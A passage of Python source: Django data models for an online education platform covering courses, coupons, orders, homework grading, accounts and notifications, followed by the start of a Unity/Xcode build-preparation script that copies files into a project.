Comment(models.Model):\n \"\"\"通用的评论表\"\"\"\n content_type = models.ForeignKey(ContentType, blank=True, null=True, verbose_name=\"类型\")\n object_id = models.PositiveIntegerField(blank=True, null=True)\n content_object = GenericForeignKey('content_type', 'object_id')\n\n p_node = models.ForeignKey(\"self\", blank=True, null=True, verbose_name=\"父级评论\")\n content = models.TextField(max_length=1024)\n account = models.ForeignKey(\"Account\", verbose_name=\"会员名\")\n disagree_number = models.IntegerField(default=0, verbose_name=\"踩\")\n agree_number = models.IntegerField(default=0, verbose_name=\"赞同数\")\n date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.content\n\n\nclass ScoreRule(models.Model):\n \"\"\"积分规则\"\"\"\n score_rule_choices = (\n (0, '未按时交作业'),\n (1, '未及时批改作业'),\n (2, '作业成绩'),\n (3, '未在规定时间内对学员进行跟进'),\n (4, '未在规定时间内回复学员问题'),\n (5, '收到学员投诉'),\n (6, '导师相关'),\n (7, '学位奖学金'),\n )\n rule = models.SmallIntegerField(choices=score_rule_choices, verbose_name=\"积分规则\")\n score_type_choices = ((0, '奖励'), (1, '惩罚'), (2, '初始分配'))\n score_type = models.SmallIntegerField(choices=score_type_choices, verbose_name=\"奖惩\", default=0)\n score = models.IntegerField(help_text=\"扣分数与贝里相等,若为0则代表规则的值可以从别处取得\")\n # maturity_days = models.IntegerField(\"成熟周期\", help_text=\"自纪录创建时开始计算\")\n memo = models.TextField(blank=True, null=True)\n\n def __str__(self):\n return \"%s-%s:%s\" % (self.get_rule_display(), self.get_score_type_display(), self.score)\n\n class Meta:\n unique_together = ('rule', 'score_type')\n\n\nclass ScoreRecord(models.Model):\n \"\"\"积分奖惩记录\"\"\"\n content_type = models.ForeignKey(ContentType, blank=True, null=True)\n object_id = models.PositiveIntegerField(blank=True, null=True)\n content_object = GenericForeignKey('content_type', 'object_id')\n\n degree_course = models.ForeignKey(\"DegreeCourse\", blank=True, null=True, verbose_name=\"关联学位课程\")\n score_rule = models.ForeignKey(\"ScoreRule\", verbose_name=\"关联规则\")\n account = models.ForeignKey(\"Account\", verbose_name=\"被执行人\")\n score = models.IntegerField(verbose_name=\"金额(贝里)\") # 这里单独有一个字段存积分而不是从score_rule里引用的原因是考虑到如果引用的话,\n received_score = models.IntegerField(\"实际到账金额贝里)\", help_text=\"仅奖励用\", default=0)\n balance = models.PositiveIntegerField(verbose_name=\"奖金余额(贝里)\")\n # 
一旦score_rule里的积分有变更,那么所有用户的历史积分也会被影响\n maturity_date = models.DateField(\"成熟日期(可提现日期)\")\n applied = models.BooleanField(default=False, help_text=\"奖赏纪录是否已被执行\", verbose_name=\"是否已被执行\")\n applied_date = models.DateTimeField(blank=True, null=True, verbose_name=\"事件生效日期\")\n date = models.DateTimeField(auto_now_add=True, verbose_name=\"事件触发日期\")\n memo = models.TextField(blank=True, null=True)\n\n def __str__(self):\n return \"%s-%s - %s - %s 奖金余额:%s\" % (self.id, self.score_rule, self.account, self.score, self.balance)\n\n # class Meta: 导师的更换 关联的enrolled_degree_course 是可以有多条惩罚记录的,不能unique_together\n # unique_together = ('content_type', 'object_id', 'account', 'score_rule')\n\n\nclass CourseSchedule(models.Model):\n \"\"\"课程进度计划表,针对学位课程,每开通一个模块,就为这个学员生成这个模块的推荐学习计划表,后面的奖惩均按此表进行\"\"\"\n study_record = models.ForeignKey(\"StudyRecord\")\n homework = models.ForeignKey(\"Homework\")\n recommend_date = models.DateField(\"推荐交作业日期\")\n\n def __str__(self):\n return \"%s - %s - %s \" % (self.study_record, self.homework, self.recommend_date)\n\n class Meta:\n unique_together = ('study_record', 'homework')\n\n\nclass EnrolledCourse(models.Model):\n \"\"\"已报名课程,不包括学位课程\"\"\"\n account = models.ForeignKey(\"Account\")\n course = models.ForeignKey(\"Course\", limit_choices_to=~Q(course_type=2))\n enrolled_date = models.DateTimeField(auto_now_add=True)\n valid_begin_date = models.DateField(verbose_name=\"有效期开始自\")\n valid_end_date = models.DateField(verbose_name=\"有效期结束至\")\n status_choices = ((0, '已开通'), (1, '已过期'))\n status = models.SmallIntegerField(choices=status_choices, default=0)\n order_detail = models.OneToOneField(\"OrderDetail\") # 使订单购买后支持 课程评价\n\n # order = models.ForeignKey(\"Order\",blank=True,null=True)\n\n def __str__(self):\n return \"%s:%s\" % (self.account, self.course)\n\n # class Meta: 一个课程到期了,可以重新购买,所以不能联合唯一\n # unique_together = ('account', 'course')\n\n\nclass DegreeRegistrationForm(models.Model):\n \"\"\"学位课程报名表\"\"\"\n enrolled_degree = models.OneToOneField(\"EnrolledDegreeCourse\")\n current_company = models.CharField(max_length=64, )\n current_position = models.CharField(max_length=64, )\n current_salary = models.IntegerField()\n work_experience_choices = ((0, \"应届生\"),\n (1, \"1年\"),\n (2, \"2年\"),\n (3, \"3年\"),\n (4, \"4年\"),\n (5, \"5年\"),\n (6, \"6年\"),\n (7, \"7年\"),\n (8, \"8年\"),\n (9, \"9年\"),\n (10, \"10年\"),\n (11, \"超过10年\"),\n )\n work_experience = models.IntegerField()\n open_module = models.BooleanField(\"是否开通第1模块\", default=True)\n stu_specified_mentor = models.CharField(\"学员自行指定的导师名\", max_length=32, blank=True, null=True)\n study_plan_choices = ((0, \"1-2小时/天\"),\n (1, \"2-3小时/天\"),\n (2, \"3-5小时/天\"),\n (3, \"5小时+/天\"),\n )\n study_plan = models.SmallIntegerField(choices=study_plan_choices, default=1)\n why_take_this_course = models.TextField(\"报此课程原因\", max_length=1024)\n why_choose_us = models.TextField(\"为何选路飞\", max_length=1024)\n your_expectation = models.TextField(\"你的期待\", max_length=1024)\n memo = models.CharField(max_length=255, blank=True, null=True)\n\n def __str__(self):\n return \"%s\" % self.enrolled_degree\n\n\nclass EnrolledDegreeCourse(models.Model):\n \"\"\"已报名的学位课程\"\"\"\n account = models.ForeignKey(\"Account\")\n degree_course = models.ForeignKey(\"DegreeCourse\")\n enrolled_date = models.DateTimeField(auto_now_add=True)\n valid_begin_date = models.DateField(verbose_name=\"有效期开始自\", blank=True, null=True) # 开通第一个模块时,再添加课程有效期,2年\n valid_end_date = models.DateField(verbose_name=\"有效期结束至\", blank=True, null=True)\n status_choices = (\n (0, 
'在学中'),\n (1, '休学中'),\n (2, '已毕业'),\n (3, '超时结业'),\n (4, '未开始'),\n # (3, '其它'),\n )\n study_status = models.SmallIntegerField(choices=status_choices, default=0)\n mentor = models.ForeignKey(\"Account\", verbose_name=\"导师\", related_name='my_students',\n blank=True, null=True, limit_choices_to={'role': 1})\n mentor_fee_balance = models.PositiveIntegerField(\"导师费用余额\", help_text=\"这个学员的导师费用,每有惩罚,需在此字段同时扣除\")\n order_detail = models.OneToOneField(\"OrderDetail\") # 使订单购买后支持填写报名表\n\n def __str__(self):\n return \"%s:%s\" % (self.account, self.degree_course)\n\n class Meta:\n unique_together = ('account', 'degree_course')\n\n\nclass Coupon(models.Model):\n \"\"\"优惠券生成规则\"\"\"\n name = models.CharField(max_length=64, verbose_name=\"活动名称\")\n brief = models.TextField(blank=True, null=True, verbose_name=\"优惠券介绍\")\n coupon_type_choices = ((0, '通用券'), (1, '满减券'), (2, '折扣券'))\n coupon_type = models.SmallIntegerField(choices=coupon_type_choices, default=0, verbose_name=\"券类型\")\n\n money_equivalent_value = models.IntegerField(verbose_name=\"等值货币\")\n off_percent = models.PositiveSmallIntegerField(\"折扣百分比\", help_text=\"只针对折扣券,例7.9折,写79\", blank=True, null=True)\n minimum_consume = models.PositiveIntegerField(\"最低消费\", default=0, help_text=\"仅在满减券时填写此字段\")\n\n content_type = models.ForeignKey(ContentType, blank=True, null=True)\n object_id = models.PositiveIntegerField(\"绑定课程\", blank=True, null=True, help_text=\"可以把优惠券跟课程绑定\")\n content_object = GenericForeignKey('content_type', 'object_id')\n\n quantity = models.PositiveIntegerField(\"数量(张)\", default=1)\n open_date = models.DateField(\"优惠券领取开始时间\")\n close_date = models.DateField(\"优惠券领取结束时间\")\n valid_begin_date = models.DateField(verbose_name=\"有效期开始时间\", blank=True, null=True)\n valid_end_date = models.DateField(verbose_name=\"有效结束时间\", blank=True, null=True)\n coupon_valid_days = models.PositiveIntegerField(verbose_name=\"优惠券有效期(天)\", blank=True, null=True,\n help_text=\"自券被领时开始算起\")\n date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return \"%s(%s)\" % (self.get_coupon_type_display(), self.name)\n\n def save(self, *args, **kwargs):\n if not self.coupon_valid_days or (self.valid_begin_date and self.valid_end_date):\n if self.valid_begin_date and self.valid_end_date:\n if self.valid_end_date <= self.valid_begin_date:\n raise ValueError(\"valid_end_date 有效期结束日期必须晚于 valid_begin_date \")\n if self.coupon_valid_days == 0:\n raise ValueError(\"coupon_valid_days 有效期不能为0\")\n if self.close_date < self.open_date:\n raise ValueError(\"close_date 优惠券领取结束时间必须晚于 open_date优惠券领取开始时间 \")\n\n super(Coupon, self).save(*args, **kwargs)\n\n\nclass CouponRecord(models.Model):\n \"\"\"优惠券发放、消费纪录\"\"\"\n coupon = models.ForeignKey(\"Coupon\")\n number = models.CharField(max_length=64, unique=True)\n # 有问题:不能为空\n account = models.ForeignKey(\"Account\", verbose_name=\"拥有者\")\n # 有问题:去掉3\n status_choices = ((0, '未使用'), (1, '已使用'), (2, '已过期'), (3, '未领取'))\n status = models.SmallIntegerField(choices=status_choices, default=0)\n # 有问题:不能为空\n get_time = models.DateTimeField(blank=True, null=True, verbose_name=\"领取时间\", help_text=\"用户领取时间\")\n\n used_time = models.DateTimeField(blank=True, null=True, verbose_name=\"使用时间\")\n order = models.ForeignKey(\"Order\", blank=True, null=True, verbose_name=\"关联订单\") # 一个订单可以有多个优惠券\n date = models.DateTimeField(auto_now_add=True, verbose_name=\"生成时间\")\n\n # _coupon = GenericRelation(\"Coupon\")\n # def __str__(self):\n # return '%s-%s-%s' % (self.account, self.number, self.status)\n\n\nclass 
Order(models.Model):\n \"\"\"订单\"\"\"\n payment_type_choices = ((0, '微信'), (1, '支付宝'), (2, '优惠码'), (3, '贝里'))\n payment_type = models.SmallIntegerField(choices=payment_type_choices)\n payment_number = models.CharField(max_length=128, verbose_name=\"支付第3方订单号\", null=True, blank=True)\n order_number = models.CharField(max_length=128, verbose_name=\"订单号\", unique=True) # 考虑到订单合并支付的问题\n account = models.ForeignKey(\"Account\")\n actual_amount = models.FloatField(verbose_name=\"实付金额\")\n\n status_choices = ((0, '交易成功'), (1, '待支付'), (2, '退费申请中'), (3, '已退费'), (4, '主动取消'), (5, '超时取消'))\n status = models.SmallIntegerField(choices=status_choices, verbose_name=\"状态\")\n date = models.DateTimeField(auto_now_add=True, verbose_name=\"订单生成时间\")\n pay_time = models.DateTimeField(blank=True, null=True, verbose_name=\"付款时间\")\n cancel_time = models.DateTimeField(blank=True, null=True, verbose_name=\"订单取消时间\")\n\n def __str__(self):\n return \"%s\" % self.order_number\n\n\nclass OrderDetail(models.Model):\n \"\"\"订单详情\"\"\"\n order = models.ForeignKey(\"Order\")\n\n content_type = models.ForeignKey(ContentType) # 可关联普通课程或学位\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n\n original_price = models.FloatField(\"课程原价\")\n price = models.FloatField(\"折后价格\")\n content = models.CharField(max_length=255, blank=True, null=True) # ?\n valid_period_display = models.CharField(\"有效期显示\", max_length=32) # 在订单页显示\n valid_period = models.PositiveIntegerField(\"有效期(days)\") # 课程有效期\n memo = models.CharField(max_length=255, blank=True, null=True)\n\n # def __str__(self):\n # return \"%s - %s - %s\" % (self.order, self.content_type, self.price)\n\n class Meta:\n # unique_together = (\"order\", 'course')\n unique_together = (\"order\", 'content_type', 'object_id')\n\n\nclass StudyRecord(models.Model):\n \"\"\"学位课程的模块学习进度\n 报名学位课程后,每个模块会立刻生成一条学习纪录\n \"\"\"\n enrolled_degree_course = models.ForeignKey(\"EnrolledDegreeCourse\")\n course_module = models.ForeignKey(\"Course\", verbose_name=\"学位模块\", limit_choices_to={'course_type': 2})\n open_date = models.DateField(blank=True, null=True, verbose_name=\"开通日期\")\n end_date = models.DateField(blank=True, null=True, verbose_name=\"完成日期\")\n status_choices = ((2, '在学'), (1, '未开通'), (0, '已完成'))\n status = models.SmallIntegerField(choices=status_choices, default=1)\n\n class Meta:\n unique_together = ('enrolled_degree_course', 'course_module')\n\n def __str__(self):\n return '%s-%s' % (self.enrolled_degree_course, self.course_module)\n\n def save(self, *args, **kwargs):\n if self.course_module.degree_course_id != self.enrolled_degree_course.degree_course_id:\n raise ValueError(\"学员要开通的模块必须与其报名的学位课程一致!\")\n\n super(StudyRecord, self).save(*args, **kwargs)\n\n\nclass HomeworkRecord(models.Model):\n \"\"\"学员作业记录及成绩\"\"\"\n homework = models.ForeignKey(\"Homework\")\n student = models.ForeignKey(\"EnrolledDegreeCourse\", verbose_name=\"学生\")\n score_choices = ((100, 'A+'),\n (90, 'A'),\n (85, 'B+'),\n (80, 'B'),\n (70, 'B-'),\n (60, 'C+'),\n (50, 'C'),\n (40, 'C-'),\n (-1, 'D'),\n (0, 'N/A'),\n (-100, 'COPY'),\n )\n score = models.SmallIntegerField(verbose_name=\"分数\", choices=score_choices, null=True, blank=True)\n mentor = models.ForeignKey(\"Account\", related_name=\"my_stu_homework_record\", limit_choices_to={'role': 1},\n verbose_name=\"导师\")\n mentor_comment = models.TextField(verbose_name=\"导师批注\", blank=True, null=True) # 导师\n status_choice = (\n (0, '待批改'),\n (1, '已通过'),\n (2, '不合格'),\n )\n status = 
models.SmallIntegerField(verbose_name='作业状态', choices=status_choice, default=0)\n\n submit_num = models.SmallIntegerField(verbose_name='提交次数', default=0)\n correct_date = models.DateTimeField('备注日期', blank=True, null=True)\n note = models.TextField(blank=True, null=True)\n date = models.DateTimeField(\"作业提交日期\", auto_now_add=True)\n\n check_date = models.DateTimeField(\"批改日期\", null=True, blank=True)\n\n update_time = models.DateTimeField(auto_now=True, verbose_name=\"提交日期\")\n\n # homework_path = models.CharField(verbose_name='作业路径', max_length=256,blank=True,null=True) 作业路径可以动态拿到,没必要存\n\n reward_choice = ((0, '新提交'),\n (1, '按时提交'),\n (2, '未按时提交'),\n (3, '成绩已奖励'),\n (4, '成绩已处罚'),\n (5, '未作按时检测'),\n )\n reward_status = models.SmallIntegerField(verbose_name='作业记录奖惩状态', default=0)\n\n def __str__(self):\n return \"%s %s\" % (self.homework, self.student)\n\n class Meta:\n unique_together = (\"homework\", \"student\")\n\n\nclass StuFollowUpRecord(models.Model):\n \"\"\"学员跟进记录\"\"\"\n enrolled_degree_course = models.ForeignKey(\"EnrolledDegreeCourse\", verbose_name=\"学生\")\n mentor = models.ForeignKey(\"Account\", related_name='mentor', limit_choices_to={'role': 1}, verbose_name=\"导师\")\n followup_tool_choices = ((0, 'QQ'), (1, '微信'), (2, '电话'), (3, '系统通知'))\n followup_tool = models.SmallIntegerField(choices=followup_tool_choices, default=1)\n record = models.TextField(verbose_name=\"跟进记录\")\n attachment_path = models.CharField(max_length=128, blank=True, null=True, verbose_name=\"附件路径\", help_text=\"跟进记录的截图等\")\n date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return \"%s --%s --%s\" % (self.enrolled_degree_course, self.record, self.date)\n\n\nclass Question(models.Model):\n \"\"\"课程提问\"\"\"\n name = models.CharField(max_length=128, blank=True, null=True, verbose_name=\"问题概要\", db_index=True)\n question_type_choices = ((0, '专题课程问题'), (1, '学位课程问题'))\n question_type = models.SmallIntegerField(choices=question_type_choices, default=0, verbose_name=\"来源\")\n account = models.ForeignKey(\"Account\", verbose_name=\"提问者\")\n degree_course = models.ForeignKey(\"DegreeCourse\", blank=True, null=True) # 若是针对整个学位课程的提问,关联这个\n course_section = models.ForeignKey(\"CourseSection\", blank=True, null=True) # 针对整个学位课程的提问不需关联特定课时\n content = models.TextField(max_length=1024, verbose_name=\"问题内容\")\n enquiries_count = models.IntegerField(default=0, verbose_name=\"同问者计数\")\n attachment_path = models.CharField(max_length=128, blank=True, null=True, verbose_name=\"附件路径\", help_text=\"问题记录的截图等\")\n date = models.DateTimeField(auto_now_add=True)\n status_choices = ((0, '待解答'), (1, '已解答'), (2, '已关闭'))\n status = models.SmallIntegerField(choices=status_choices, default=0)\n\n def __str__(self):\n return \"%s\" % self.name\n\n def save(self, *args, **kwargs):\n if self.degree_course is None and self.course_section is None:\n raise ValueError(\"提的问题必须关联学位课程或具体课时!\")\n\n super(Question, self).save(*args, **kwargs)\n\n\nclass Answer(models.Model):\n \"\"\"问题解答\"\"\"\n question = models.ForeignKey(\"Question\", verbose_name=\"问题\")\n content = models.TextField(verbose_name=\"回答\")\n account = models.ForeignKey(\"Account\", verbose_name=\"回答者\")\n agree_number = models.IntegerField(default=0, verbose_name=\"点赞数\")\n disagree_number = models.IntegerField(default=0, verbose_name=\"点踩数\")\n answer_date = models.DateTimeField(auto_now=True, verbose_name=\"日期\")\n\n def __str__(self):\n return \"%s\" % self.question\n\n\nclass AnswerComment(models.Model):\n \"\"\"答案回复评论\"\"\"\n answer = 
models.ForeignKey(\"Answer\")\n reply_to = models.ForeignKey(\"self\", blank=True, null=True, verbose_name=\"基于评论的评论\")\n comment = models.TextField(max_length=512, verbose_name=\"评论内容\")\n attachment_path = models.CharField(max_length=128, blank=True, null=True, verbose_name=\"附件路径\", help_text=\"跟进记录的截图等\")\n account = models.ForeignKey(\"Account\", verbose_name=\"评论者\")\n date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return \"%s - %s\" % (self.account, self.comment)\n\n\nclass QACounter(models.Model):\n \"\"\" 问题和回答的赞同数量统计 \"\"\"\n content_type = models.ForeignKey(ContentType)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n data_type_choices = ((0, '点赞'), (1, '踩'), (2, '同问'))\n data_type = models.SmallIntegerField(choices=data_type_choices)\n account = models.ForeignKey(\"Account\")\n date = models.DateTimeField(auto_now=True)\n\n class Meta:\n unique_together = (\"content_type\", 'object_id', \"account\")\n\n\nclass Tags(models.Model):\n tag_type_choices = ((0, '文章标签'), (1, '课程评价标签'), (2, '用户感兴趣技术标签'))\n tag_type = models.SmallIntegerField(choices=tag_type_choices)\n name = models.CharField(max_length=64, unique=True, db_index=True)\n\n def __str__(self):\n return self.name\n\n\nclass TransactionRecord(models.Model):\n \"\"\"贝里交易纪录\"\"\"\n account = models.ForeignKey(\"Account\")\n amount = models.IntegerField(\"金额\")\n balance = models.IntegerField(\"账户余额\")\n transaction_type_choices = ((0, '收入'), (1, '支出'), (2, '退款'), (3, \"提现\")) # 2 为了处理 订单过期未支付时,锁定期贝里的回退\n transaction_type = models.SmallIntegerField(choices=transaction_type_choices)\n\n content_type = models.ForeignKey(ContentType, blank=True, null=True)\n object_id = models.PositiveIntegerField(blank=True, null=True, verbose_name=\"关联对象\")\n content_object = GenericForeignKey('content_type', 'object_id')\n\n transaction_number = models.CharField(unique=True, verbose_name=\"流水号\", max_length=128)\n date = models.DateTimeField(auto_now_add=True)\n memo = models.CharField(max_length=128, blank=True, null=True)\n\n def __str__(self):\n return \"%s\" % self.transaction_number\n\n\nclass Notification(models.Model):\n \"\"\"消息通知纪录\"\"\"\n account = models.ForeignKey(\"Account\", blank=True, null=True, help_text=\"不填用户的话代表给未注册用户发通知\")\n notify_obj = models.CharField(max_length=64, verbose_name='通知对象', help_text='account_id,email、mobile、open_id')\n content = models.TextField(max_length=1024)\n date = models.DateTimeField(auto_now_add=True, verbose_name='消息添加时间')\n msg_type_choices = (\n (0, \"奖惩通知\"),\n (1, \"订单通知\"),\n (2, \"专题课程报名\"),\n (3, \"课程过期\"),\n (4, \"课程评论\"),\n (5, \"优惠券通知\"),\n (6, \"课程开课通知\"),\n (7, \"学位课程作业\"),\n (8, \"学位课程问答\"),\n (9, \"资讯阅读通知\"),\n (11, \"课程问答\"),\n (12, \"学位课程报名\"),\n (13, \"导师分配通知\"),\n (15, \"学位学习事务通知\"),\n (16, \"其他\"),\n )\n\n msg_type = models.SmallIntegerField(choices=msg_type_choices)\n notify_type_choices = ((0, '站内信'), (1, '短信'), (2, '邮件'), (3, '微信'), (4, '其它'))\n notify_type = models.SmallIntegerField(choices=notify_type_choices)\n\n # notify_belong_choices = ((0, '站内事务通知'), (4, '课程相关通知'), (2, '资讯相关通知'))\n # notify_belong = models.SmallIntegerField(choices=notify_belong_choices)\n\n content_type = models.ForeignKey(ContentType, blank=True, null=True)\n object_id = models.PositiveIntegerField(blank=True, null=True, verbose_name=\"关联对象\")\n content_object = GenericForeignKey('content_type', 'object_id')\n\n apply_now = models.BooleanField(default=False, help_text=\"如果需要立刻通知用户,请勾选\", 
verbose_name=\"是否立即执行\")\n applied_status = models.BooleanField(default=False, help_text=\"消息通知是否已被执行\", verbose_name=\"是否已被执行\")\n excution_status = models.BooleanField(\"执行是否成功\", default=False)\n excution_result = models.TextField(\"执行返回结果\", blank=True, null=True)\n applied_date = models.DateTimeField(blank=True, null=True, verbose_name=\"通知日期时间\", help_text=\"若不是立刻执行,需设置执行时间\")\n\n def __str__(self):\n return '%s-%s-%s' % (self.notify_obj, self.msg_type, self.notify_type)\n\n\nclass MentorGroup(models.Model):\n \"\"\"导师组\"\"\"\n\n name = models.CharField(max_length=64, unique=True)\n brief = models.TextField(blank=True, null=True)\n mentors = models.ManyToManyField(\"Account\", limit_choices_to={'role': 1})\n\n def __str__(self):\n return self.name\n\n\nclass Account(models.Model):\n username = models.CharField(\"用户名\", max_length=64, unique=True)\n email = models.EmailField(\n verbose_name='email address',\n max_length=255,\n unique=True,\n blank=True,\n null=True\n )\n\n uid = models.CharField(max_length=64, unique=True, help_text='微信用户绑定和CC视频统计') # 与第3方交互用户信息时,用这个uid,以避免泄露敏感用户信息\n mobile = models.BigIntegerField(verbose_name=\"手机\", unique=True, help_text=\"用于手机验证码登录\")\n qq = models.CharField(verbose_name=\"QQ\", max_length=64, blank=True, null=True, db_index=True)\n weixin = models.CharField(max_length=128, blank=True, null=True, db_index=True, verbose_name=\"微信\")\n profession = models.ForeignKey(\"Profession\", verbose_name=\"职位信息\", blank=True, null=True) # 职位相关信息,注册时必选\n tags = models.ManyToManyField(\"Tags\", blank=True, verbose_name=\"感兴趣的标签\")\n city = models.ForeignKey(\"City\", verbose_name=\"城市\", blank=True, null=True) # 所在城市,注册时必填, 通过城市能找到对应的省份\n signature = models.CharField('个人签名', blank=True, null=True, max_length=255)\n brief = models.TextField(\"个人介绍\", blank=True, null=True)\n\n openid = models.CharField(max_length=128, blank=True, null=True)\n gender_choices = ((0, '保密'), (1, '男'), (2, '女'))\n gender = models.SmallIntegerField(choices=gender_choices, default=0, verbose_name=\"性别\")\n degree_choices = ((0, \"学历\"), (1, '高中以下'), (2, '中专/高中'), (3, '大专'), (4, '本科'), (5, '硕士'), (6, '博士'))\n degree = models.PositiveSmallIntegerField(choices=degree_choices, blank=True,\n null=True, default=0, verbose_name=\"学历\")\n birthday = models.DateField(blank=True, null=True, verbose_name=\"生日\")\n id_card = models.CharField(max_length=32, blank=True, null=True, verbose_name=\"身份证号或护照号\")\n password = models.CharField('password', max_length=128,\n help_text=mark_safe('''重置密码'''))\n is_active = models.BooleanField(default=True, verbose_name=\"账户状态\")\n is_staff = models.BooleanField(verbose_name='staff status', default=False, help_text='决定着用户是否可登录管理后台')\n name = models.CharField(max_length=32, default=\"\", verbose_name=\"真实姓名\")\n head_img = models.CharField(max_length=128, default='/static/frontend/head_portrait/logo@2x.png',\n verbose_name=\"个人头像\")\n role_choices = ((0, '学员'), (1, '导师'), (2, '讲师'), (3, '管理员'))\n role = models.SmallIntegerField(choices=role_choices, default=0, verbose_name=\"角色\")\n\n # #此处通过transaction_record表就可以查到,所以不用写在这了。错错错\n balance = models.PositiveIntegerField(default=0, verbose_name=\"可提现和使用余额\")\n\n memo = models.TextField('备注', blank=True, null=True, default=None)\n date_joined = models.DateTimeField(auto_now_add=True, verbose_name=\"注册时间\")\n\n class Meta:\n verbose_name = '账户信息'\n verbose_name_plural = \"账户信息\"\n\n def save(self, *args, **kwargs):\n if not self.pk:\n # This code only happens if the objects is not in the database yet. 
Otherwise it would have pk\n m = hashlib.md5()\n m.update(self.username.encode(encoding=\"utf-8\"))\n self.uid = m.hexdigest()\n super(Account, self).save(*args, **kwargs)\n\n def __str__(self):\n return self.username\n\n\nclass UserAuthToken(models.Model):\n \"\"\"\n 用户Token表\n \"\"\"\n user = models.OneToOneField(to=\"Account\")\n token = models.CharField(max_length=40)\n created = models.DateTimeField(auto_now_add=True)\n\n def save(self, *args, **kwargs):\n import datetime\n\n self.token = self.generate_key()\n self.created = datetime.datetime.utcnow()\n return super(UserAuthToken, self).save(*args, **kwargs)\n\n def generate_key(self):\n import os\n import binascii\n return binascii.hexlify(os.urandom(20)).decode()\n\n\nclass Province(models.Model):\n \"\"\"\n 省份表\n \"\"\"\n code = models.IntegerField(verbose_name=\"省代码\", unique=True)\n name = models.CharField(max_length=64, verbose_name=\"省名称\", unique=True)\n\n def __str__(self):\n return \"{} - {}\".format(self.code, self.name)\n\n class Meta:\n verbose_name = \"省\"\n verbose_name_plural = verbose_name\n\n\nclass City(models.Model):\n \"\"\"\n 城市表\n \"\"\"\n code = models.IntegerField(verbose_name=\"市\", unique=True)\n name = models.CharField(max_length=64, verbose_name=\"市名称\") # 城市名可能有重复\n province = models.ForeignKey(\"Province\")\n\n def __str__(self):\n return \"{} - {}\".format(self.code, self.name)\n\n class Meta:\n verbose_name = \"市\"\n verbose_name_plural = verbose_name\n\n\nclass Industry(models.Model):\n \"\"\"\n 行业表\n \"\"\"\n code = models.IntegerField(verbose_name=\"行业代码\", unique=True)\n name = models.CharField(max_length=64, verbose_name=\"行业名称\")\n\n def __str__(self):\n return \"{} - {}\".format(self.code, self.name)\n\n class Meta:\n verbose_name = \"行业信息\"\n verbose_name_plural = verbose_name\n\n\nclass Profession(models.Model):\n \"\"\"\n 职位表,与行业表外键关联\n \"\"\"\n code = models.IntegerField(verbose_name=\"职位代码\")\n name = models.CharField(max_length=64, verbose_name=\"职位名称\")\n industry = models.ForeignKey(\"Industry\")\n\n def __str__(self):\n return \"{} - {}\".format(self.code, self.name)\n\n class Meta:\n unique_together = (\"code\", \"industry\")\n verbose_name = \"职位信息\"\n verbose_name_plural = verbose_name\n\n\nclass BulletScreen(models.Model):\n account = models.ForeignKey(\"Account\") # 发弹幕的人\n content = models.CharField(max_length=255) # 弹幕详情\n course_section = models.ForeignKey(\"CourseSection\") # 具体发送到哪个课时(视频 )\n play_point = models.IntegerField() # 发送弹幕的时间处于该课时视频的具体秒数\n date = models.DateTimeField(auto_now_add=True) # 弹幕存储时间\n\n\nclass Feedback(models.Model):\n \"\"\"用户反馈表\"\"\"\n name = models.CharField(max_length=32, blank=True, null=True)\n contact = models.CharField(max_length=64, blank=True, null=True)\n feedback_type_choices = ((0, '网站优化建议'), (1, '烂!我想吐槽'), (2, '网站bug反馈'))\n feedback_type = models.SmallIntegerField(choices=feedback_type_choices)\n content = models.TextField(max_length=1024)\n date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.name\n","repo_name":"WuPeiqi/luffycity","sub_path":"repository/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":47677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8561106547","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author: fasthro\n# @Date: 2016-11-15 11:21:33\n# @Last Modified by: fasthro\n# @Last Modified time: 2016-11-15 11:21:57\nimport shutil\nimport os\nimport re\nimport platform\nfrom pbxproj import *\nimport 
shutil\n# 修改工程\nfrom pbxproj.pbxextensions import TreeType\n\n# 打包之前准备工作\nclass PreparatoryWork:\n def __init__(self, frompath, topath, filefromls, filetols, folderfromls, foldertols):\n\n\n # from 根目录\n self.from_path = frompath\n # to 根目录\n self.to_path = topath\n\n # 需要 copy 的文件\n self.file_from_path_list = filefromls\n self.file_to_path_list = filetols\n\n # 需要 copy 的目录\n self.folder_from_list = folderfromls\n print(\"folder_from_list:===>\")\n print(folderfromls)\n print(\"\\n\")\n self.folder_to_path_list = foldertols\n print(\"foldertols:===>\")\n print(foldertols)\n print(\"\\n\")\n\n # copy\n self.copy(filefromls, filetols)\n self.copy(folderfromls, foldertols)\n\n def copy(self, fs, ts):\n\n for index in range(len(fs)):\n frompath = os.path.join(self.from_path, fs[index])\n topath_temp = os.path.join(self.to_path, ts[index])\n topath = os.path.join(topath_temp, fs[index])\n\n # 如果已经存在就删除\n if os.path.exists(topath):\n if os.path.isdir(topath):\n shutil.rmtree(topath)\n else:\n os.remove(topath)\n\n if os.path.isfile(frompath):\n print(\"copy %s -> %s\" % (frompath, topath))\n shutil.copy(frompath, topath)\n else:\n print(\"copy %s -> %s\" % (frompath, topath))\n shutil.copytree(frompath, topath)\n\n\n# Xcode *.pbxproj 相关设置\nclass Xcode:\n \"\"\"\n ·xpath : xcode 根目录\n ·folders : 需要添加的文件夹列表\n ·files : 需要添加的文件列表\n \"\"\"\n\n def __init__(self, xpath=None, folders=[], files=[]):\n\n # xcode project path\n self.xcode_project_path = xpath\n\n # xcode pbxproj path\n if platform.system() == \"Windows\":\n self.xcode_pbxproj_path = os.path.join(xpath, 'Unity-iPhone.xcodeproj/project.pbxproj.xml')\n else:\n self.xcode_pbxproj_path = os.path.join(xpath, 'Unity-iPhone.xcodeproj/project.pbxproj')\n print(\"XcodeProjectPath=%s\"%(self.xcode_pbxproj_path))\n # need add folders\n self.folders = folders\n\n # need add files\n self.files = files\n\n self.project = None\n\n if self.xcode_pbxproj_path is not None:\n pstr_xml = self.xcode_pbxproj_path[len(self.xcode_pbxproj_path) - 4: len(self.xcode_pbxproj_path)]\n pstr_proj = 